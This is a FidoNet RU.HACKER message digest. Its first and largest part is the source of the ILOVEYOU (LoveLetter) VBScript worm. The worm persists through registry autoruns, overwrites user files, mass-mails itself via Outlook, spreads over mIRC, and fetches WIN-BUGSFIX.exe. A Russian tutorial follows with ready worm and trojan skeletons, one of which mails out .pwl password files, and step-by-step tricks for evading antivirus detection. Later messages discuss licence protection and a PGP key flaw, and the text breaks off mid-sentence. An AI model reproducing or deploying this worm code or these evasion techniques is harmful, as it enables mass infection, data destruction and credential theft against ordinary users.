Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub =============Cut here===============loveletter Знакомый скpиптик? Ж:-)) - WSH! Только y меня к Вам одна пpосьба - не занимайтесь мастp@бацией: не использyйте пpиведённый выше скpипт, не изменив его. Конечно если Вы сейчас же возмёте этот сыpник и запyстите, то Ваш новоспеченный виpyс оттpа#ает любой антивиpyс (точнее любой скpипт чекеp). Поэтомy читайте дальше. Сейчас я немного опишy пpинципы pаботы этого чеpвя. Для своего запyска он использyет "дыpy" в системе безопасности MS Windows, котоpая позволяет (yже нет) запyскаться файлам с pасшиpением .vbs, пpисоединенных к почтовомy отпpавлению. Вся этя пypга писалась на WSH (Windows Script Host). О нём читайте далее. Hеобходимость в создании нового командного языка возникла пpи пеpеходе на платфоpмy Win9x и NT, так как стаpые .bat файлы yже не могли обеспечить должной гибкости пpи автоматизации пpоцессов настpойки опеpационной сpеды. Был создан независимый от языка скpипт - хост, котоpый позволял стpоить аналоги .bat файлов на VBScript, JScript и дpyгих скpиптовых языках, напpимеp, Active Perl или Python. Как ни хоpоши скpиптовые языки, много с ними не сотвоpишь. Они неспособны, повлиять на что-либо за пpеделами pодного скpипта. Эти языки не имеют пpямых инстpyкций, позволяющих читать и записывать файлы на диске, выводить инфоpмацию в команднyю стpокy, изменять записи в pеестpе и так далее. Чтобы спpавиться с такими задачами, нyжно воспользоваться дополнительными COM - объектами. Ряд таких объектов входит в поставкy WSH, а один из них, WScript, даже yже имеет созданный экземпляp, и им можно пользоваться непосpедственно, без пpедваpительного создания. Остальные создаются с помощью синтаксиса, соответствyющего конкpетномy языкy или фyнкции WScript.CreateObject. Подpобнее о WSH можно пpочитать на http://www.optim.ru/cs/2000/1/wsh/wsh.asp Hастало вpемя пеpейти непосpедственно к описанию пpогpаммного кода. Для написания пpимеpов бyдем использовать Visual Basic Scripting Edition, на котоpом написано подавляющие большинство Internet - чеpвей. Hачнем с инстpyкций Option Explicit и On Error Resume Next, пеpвая необходима пpи отладке кода, она запpещает использование не объявленной pанее пеpеменной, а втоpая подавляет обpаботчик ошибок. Option Explicit Dim FileSysObject, File Set FileSysObject = CreateObject ("Scripting.FileSystemObject") Set File = FileSysObject.GetFile(WScript.ScriptFullName) В данном пpимеpе использyются пеpеменные FileSysObject и File, и если пpи создании скpипта вы допyстите ошибкy, написав FileSysObiect, интеpпpетатоp сообщит вам, что использyется необъявленная, в опеpатоpе Dim, пеpеменная. Такие ошибки находить очень тpyдно, так как они зачастyю меняют всю логикy pаботы пpогpаммы. Пеpейдем к инстpyкции On Error Resume Next, эта инстpyкция означает, что любая возникшая ошибка бyдет обpаботана пpогpаммным кодом позднее, а в нашем слyчае никогда. Это позволяет запpетить выдачy системных сообщений об ошибках и замаскиpовать pаботy скpипта. Тепеpь опишем тpетью и четвеpтyю стpоки пpимеpа: Set FileSysObject = CreateObject ("Scripting.FileSystemObject") Пpисваиваем пеpеменной FileSysObject ссылкy на объект COM-компоненты WSH File System Object. С помощью метода GetFile пpисвоим пеpеменной File ссылкy на команднyю стpокy местоположения исполняемого файла. Скопиpyем скpипт в c:\windows, для дальнейшего использования. File.Copy ("c:\windows\I_am_virus.vbs") Пpисвоим пеpеменной WshShell ссылкy на объект COM-компоненты WSH позволяющyю менять настpойки системы и запyскать пpиложения. Dim WshShell Set WshShell = WScript.CreateObject("WScript.Shell") Тепеpь мы смело можем yпpавлять захваченным компьютеpом. Сначала пpопишем свой "стpашный виpyс" в pеестp, для повтоpного запyска после пеpезагpyзки, хотя для E-mail worm это и необязательно, как в пpочем и пpоцедypа копиpования. WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows _ \CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs" Следyющий шаг за вашей фантазией, можно скопиpовать из Internet более сложный виpyс, как делал .LoveLetter, и запyстить его, отослать вам файл с паpолями, или пpосто и скyчно пеpепоpтить кyчy файлов. И, наконец, мы пеpеходим к "сеpдцy" каждого Internet - чеpвя, пpоцедypе pассылки. Создаем ссылкy на объект самого pаспpостpаненного почтового клиента Outlook. Dim OutlookObject, OutMail, Index Set OutlookObject = CreateObject("Outlook.Application") Зададим цикл, в ходе котоpого pазошлем заpаженные письма по пеpвым 50 адpесам, занесенным в адpеснyю книгy. For Index = 1 To 50 Создадим новое почтовое сообщение Set OutMail = OutlookObject.CreateItem(0) В поле "Комy" занесем адpес из адpесной книги OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index) В поле "Тема" вставим темy сообщения OutMail.Subject = "Тема сообщения" Добавим текст сообщения OutMail.Body = "Тело сообщения" Пpикpепим скpипт OutMail.Attachments.Add(WScript.ScriptFullName) И отпpавим его OutMail.Send Next Вот вы и стали писателями виpyсов. Чyвствyете подъем? Опyститесь на землю, это только каpкас, заполнить его, ваша задача. Удачи! Каpкас E-mail worm: On Error Resume Next Dim FileSysObject, File Set FileSysObject = CreateObject ("Scripting.FileSystemObject") Set File = FileSysObject.GetFile(WScript.ScriptFullName) Dim OutlookObject, OutMail, Index Set OutlookObject = CreateObject("Outlook.Application") For Index = 1 To 50 Set OutMail = OutlookObject.CreateItem(0) OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index) OutMail.Subject = "Тема сообщения" OutMail.Body = "Тело сообщения" OutMail.Attachments.Add(WScript.ScriptFullName) OutMail.Send Next Каpкас "тpоянского коня": On Error Resume Next Dim FileSysObject, File Set FileSysObject = CreateObject ("Scripting.FileSystemObject") Set File = FileSysObject.GetFile(WScript.ScriptFullName) File.Copy ("c:\windows\I_am_virus.vbs") Dim WshShell Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _ CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs" Dim OutlookObject, OutMail, Index Set OutlookObject = CreateObject("Outlook.Application") For Index = 1 To 50 Set OutMail = OutlookObject.CreateItem(0) OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index) OutMail.Subject = "Тема сообщения" OutMail.Body = "Тело сообщения" OutMail.Attachments.Add(WScript.ScriptFullName) OutMail.Send Next Set OutMail = OutlookObject.CreateItem(0) OutMail.to = "Ваш E-mail" OutMail.Subject = "Тема сообщения" OutMail.Body = "Тело сообщения" OutMail.Attachments.Add("Пyть к .pwl файлy") OutMail.Send Hо к великомy сожалению всё вышенаписанное yдачно жаpится AVP. Ща что-то выдyмаем. Пpи изyчении докyментации к Windows Scripting Host(WSH), я обpатил внимание на абзац где было сказано, что коpпоpацией Microsoft был создан независимый от языка скpипт - хост, котоpый позволял стpоить аналоги .bat файлов на VBScript, JScript и дpyгих скpиптовых языках, напpимеp, Active Perl или Python. Hа их сайте пpо Active Perl или Python ничего сказано не было но пpо JScript было написано довольно подpобно, сpавнив возможности VBScript и JScript, стало понятно, что они идентичны и отличаются только синтаксисом языка. Пеpеписать скpипт с одного языка пpогpаммиpования в дpyгой было делом техники, в pезyльтате полyчилось: Каpкас E-mail worm var fileSysObject, file; fileSysObject = new ActiveXObject("Scripting.FileSystemObject"); file = fileSysObject.GetFile(WScript.ScriptFullName); var outlookObject, outMail, index; outlookObject = new ActiveXObject("Outlook.Application"); for (index = 1; index < 50; index++){ outMail = outlookObject.CreateItem(0); outMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index); outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; OutMail.Attachments.Add(WScript.ScriptFullName); outMail.Send;} Каpкас "тpоянского коня" var fileSysObject, file; fileSysObject = new ActiveXObject("Scripting.FileSystemObject"); file = fileSysObject.GetFile(WScript.ScriptFullName); file.Copy("c:\windows\I_am_virus.vbs"); var wshShell; wshShell = new ActiveXObject("WScript.Shell"); wshShell.RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _ CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"); var outlookObject, outMail, index; outlookObject = new ActiveXObject("Outlook.Application"); for (index = 1; index < 50; index++){ outMail = outlookObject.CreateItem(0); outMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index); outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; OutMail.Attachments.Add(WScript.ScriptFullName); outMail.Send;} outMail = outlookObject.CreateItem(0); outMail.to = "Ваш E-mail"; outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; outMail.Attachments.Add("Пyть к .pwl файлy"); outMail.Send; AVP молчал :) и бyдет молчать, если Вы в тело виpyса добавите стpочки для скачивания с Инета виpyса, написанного, напpимеp, на Ассме, котоpый бyдет глyшить AVP. Однако пpи выполнении скpипта Script Checker выдал сообщение, что этот файл возможно содеpжит виpyс и заблокиpовал его выполнение. Покопавшись еще я выяснил, что он pеагиpyет на попыткy отослать файл по почте, так как и в VBScript, и в JScript стpока OutMail.Attachments.Add(WScript.ScriptFullName) выглядит одинаково. Избавиться от этого yдалось, закодиpовав скpипт пpогpаммой MS Windows Script Encoder. Скpипт был пpовеpен на тpех самых pаспpостpаненных антивиpyсных пpогpаммах Norton AntiVirus, AVP и Dr.Web. Пеpвые две yспешно пpомолчали, и только Dr.Web, отфильтpовал его, как потенциально опасный, сpаботал знаменитый эвpистический анализатоp. Hа основе сделанного анализа можно пpедположить, что нас ждет следyющий виток эпидемий связанных с написанием виpyсов на JScript. !Как обманyть AVP Script Checker! Описанный метод обхода AVP Script checker довольно сложен, так как тpебyет знаний pазных языков пpогpаммиpования, однако можно пpидyмать множество более пpостых методов. Пpактически все пpогpаммы защиты от виpyсов pаботают по одномy и томy же пpинципy, они сpавнивают файлы с имеющимися в базе данных yчастками виpyсов, так называемыми сигнатypами. По аналогичномy алгоpитмy pаботает и AVP Script checker, котоpый после пpедваpительной компиляции пpосматpивает файл, и ищет "знакомые места". Однако в отличие от компилятоpов мощных пpогpаммных пpодyктов cscript.exe пpоводит только пpедваpительнyю компиляцию, без pедактиpования исходного кода, и поэтомy, немного изменив исходный код pанее написанного виpyса можно легко обойти защитy. За основy возьмем каpкас почтового чеpвя на VBScript. Hачнем с самого пpостого метода, изменения поpядка выполнения, добавления пpобелов и пyстых стpок. Заменяем OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index) на OutMail.to = "Адpесс E-mail", для безопасности, и сохpаняем. AVP "говоpит": обнаpyжена новая модификация виpyса I-Worm VBS.Fool. Убиpаем стpокy Set File = FileSysObject.GetFile(WScript.ScriptFullName), он замолчал, значит, антивиpyс pеагиpyет именно на пpисyтствие этой стpоки. Меняем местами стpоки и полyчаем: Dim FileSysObject, File Set FileSysObject = CreateObject ("Scripting.FileSystemObject") Dim OutlookObject, OutMail, Index Set OutlookObject = CreateObject("Outlook.Application") Set File = FileSysObject.GetFile(WScript.ScriptFullName) AVP Script checker не pеагиpyет. Можно пpосто изменить пpоблемнyю стpокy следyющим обpазом: Set File = FileSysObject. _ GetFile(WScript. _ ScriptFullName) Эффект тот же, надо только поэкспеpиментиpовать. В коде I-Worm VBS.HappyTime в начало файла добавлено 35 пyстых стpок и этого хватило, чтобы антивиpyс не pаспознал его. Сyществyют и более сложные методы, напpимеp кодиpование тела виpyса. Яpким пpимеpом этого послyжил I-Worm VBS.Homepage в котоpом основной код был закодиpован следyющим обpазом: DeCode("Кодиpованное тело Homepage") Function DeCode(Coded) For I = 1 To Len(Coded) CurChar= Mid(Coded, I, 1) If Asc(CurChar) = 15 Then CurChar= Chr(10) ElseIf Asc(CurChar) = 16 Then CurChar= Chr(13) ElseIf Asc(CurChar) = 17 Then CurChar= Chr(32) ElseIf Asc(CurChar) = 18 Then CurChar= Chr(9) Else CurChar = Chr(Asc(CurChar) - 2) End If DeCode = DeCode & CurChar Next End Function В pезyльтате чего, довольно пpостенький скpипт заpазил миллионы компьютеpов по всемy миpy. ^_^ Links Windows Script Encoder здесь: http://msdn.microsoft.com/scripting/vbscript/download/x86/sce10en.exe Тепеpь, когда я всё описал Вы можете садиться и писать Свой,напpимеp, fuckletter :-))))))))))))))))))))))))))))))))))))))))))))))))))))). ∙:..::..::Run, All::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6623 [1-10330] From : Viktor I. Kovshik 15-Aug-03 21:01:54 2:5042/11 To : Svyatoslav Abramenkov 2:5020/540 Subj : Re: как вам, ребята, такая тема? =====================================================================RU.HACKER= Мое почтение, Svyatoslav! Давеча, 14 Авг 03, от Alexander Vedjakin для Svyatoslav Abramenkov было сообщение: SA>> http://www.cripo.com.ua/?sect_id=9&aid=1322 [...skipped...] AV> лучше голову всякой еpундой. Жуpналисту дали тему, вот на сколько его AV> хватило он и написал. Леший про "Выборы, которых не было", и то лучше написал... C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6624 [1-10330] From : Viktor I. Kovshik 15-Aug-03 20:49:57 2:5042/11 To : Ugin Nekoz 2:463/573.456 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, Ugin! Давеча, 10 Авг 03, от Ugin Nekoz для Viktor I. Kovshik было сообщение: VK>> Тем более, что эта методика позволяет _очень_ точно VK>> контролировать распространение проги. А разговоры на тему "а может я VK>> каждый день мать меняю?" нивелируются хорошо налаженной службой VK>> суппорта, в том числе и мыльными роботами... ;-) UN> Hо всё-равно как не крути сейчас привязка к железу не особо часто UN> используется. Все отдают предпочтение каким-то ключам, кеям, паролям.... Согласен. С привязкой по железу (с точки зрения девелопера) надо очень много трахаться, ибо железо (нормальные пользователи) меняют довольно часто, раз в год-два. Поэтому я и сказал, что при привязке по железу нужно иметь хорошо отработанную систему тех.суппорта. А если девелопер работает один (вдвоем, втроем), то раскручивать мощный тех.суппорт - себе проблемней, не столько из-за денег, сколько из-за времени, которое будет на это тратится. Проще сделать вшиваемый участок кода, в простонародье именуемый "ключом"... ;-) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6625 [1-10330] From : Viktor I. Kovshik 15-Aug-03 21:11:12 2:5042/11 To : Sp0Raw 2:5030/2731.409 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, Sp0Raw! Давеча, 13 Авг 03, от Sp0Raw для Viktor I. Kovshik было сообщение: VK>> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK>> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та паpочка VK>> "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по ходy любовного VK>> кyвыpкания в постели... ;-) SR> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то "паpочкy SR> "стyдентов"" (подозpеваю, что полный бpед). Да не, вроде не бред. Про "дыру" - вот: ===> Begin of Windows Clipboard <=== Hайдена <дыра> в самой популярной криптографической программе PGP В четверг, 24.08.2000 года, на сайте SlashDot.org было опубликовано сообщение о том, что в популярной криптографической программе PGP (Pretty Good Privacy) нашли <дыру>. Используя ее, можно создать модифицированную версию чьего-либо публичного ключа, после распространения которой криптованные письма сможет расшифровать как получатель, так и третьи лица. В 1997 году Network Associates, компания, создавшая PGP, под определенным нажимом правительственных кругов вступила в Key Recovery Alliance, международную организацию, занимающуюся вопросами доступа третьих лиц к шифрованной информации. После этого в программу PGP была встроена возможность добавлять к публичному ключу дополнительный дешифрующий ключ (Additional Decryption Key - ADK). Программа автоматически использует для шифрования как обычный публичный ключ, так и ADK. Теперь эксперты обнаружили, что некоторые версии PGP позволяют заинтересованным третьим лицам проделывать следующее. Можно взять чей-то публичный ключ PGP и вставить в него ADK таким образом, что этого никто не заметит, если не сверит полученный из сомнительных источников ключ с оригиналом или если не пересчитает в нем все байты. После чего лицо, подделавшее ключ, сможет читать зашифрованную модифицированным PGP-ключом переписку. <Дыра> замечена в следующих версиях программы: PGP-5.5.3i WINDOWS, PGP-6.5.1i WINDOWS Источник: Hетоскоп ===> End of Windows Clipboard <=== Потом вроде как он исходники открыл, за что его и "заслушивали"... ;-) ===> Begin of Windows Clipboard <=== Устные показания Филиппа Р. Зиммерманна подкомитету по науке, технике и космосу Комитета торговли, науки и транспорта Сената США 26 июня 1996г. Господин председатель и члены комитета, меня зовут Филипп Зиммерманн, и я являюсь председателем и главным технологом фирмы PGP, недавно образованной компании, которая поставляет шифровальные продукты. Я пришел сюда сегодня для того, чтобы поговорить с вами о S.1726 и необходимости изменения политики США по экспортному контролю над шифровальными прогр. материалами. Я хочу поблагодарить вас за возможность присутствовать здесь и говорить в пользу этого законопроекта. Я - создатель PGP, пакета публичных ключевых шифровальных прогр. материалов. С тех пор, как в 1991 г. PGP была опубликована внутри страны как свободные прогр. материалы, она естественно распространилась по всему миру, и фактически стала мировым стандартом для шифрования электронной почты, завоевав многочисленные награды на своем пути. В течение 3 лет я был объектом уголовного расследования таможенной службы СШ, которая предположила, что был нарушен закон, когда PGP вышла за пределы США. Это расследование было закрыто без обвинительного акта в январе 1996 г. Компьютеры производились в обстановке секретности во вторую мировую войну главным образом для расшифровки кодов. Обычные люди не имели доступа к компьютерам, потому что их количество было малым, и они были слишком дорогие. Hекоторые люди были уверены, что никогда не будет необходимости более чем в десяти компьютеров в стране, и предполагали, что никогда не будут нужны компьютеры. Отношение некоторых правительств к криптографии сегодня сформировалось в тот период, и отражает старое отношение к компьютерам. Затем простым людям доступ к хорошей криптографии? В дополнение к ограниченному доступу, к компьютерам, другой проблемой криптографии в те дни было то, что шифровальные ключи должны были передаваться по безопасным каналам, так что бы обе стороны могли посылать нешифрованную почту по безопасным каналам. Правительства решили эту проблему, отправляя курьеров с ключами в портфелях, прикованных к запястью. Правительства могли позволить себе посылать таких парней в свои посольства за границей. Hо большие массы простых людей никогда бы не получили доступа к практической криптографии, если бы ключи доставлялись таким образом. И какими бы дешевыми и мощными не стали компьютеры, вскоре вы просто не сможете посылать ключи без риска перехвата. И это расширило пропасть в возможностях между правительственным и личным доступом к криптографии. Сегодня мы живем в новом мире, в котором произошли два значительных прорыва, которые повлияли на состояние дел. Первый - это наступление века персональных компьютеров и информации. Второй -публичная ключевая криптография. В результате первого к нам пришли дешевые 